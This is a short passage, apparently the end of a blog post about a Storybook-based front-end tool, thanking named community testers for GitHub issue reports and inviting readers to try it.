Thanks to early testers in the community, such as Ivan Berdinsky and Sean Blommaert, who've already submitted some issues to the GitHub queue. We're really happy to see it in use in the Admin Initiative's work on a new toolbar.

Give it a try, and let us know what you think.

Tagged

Storybook, Front End Development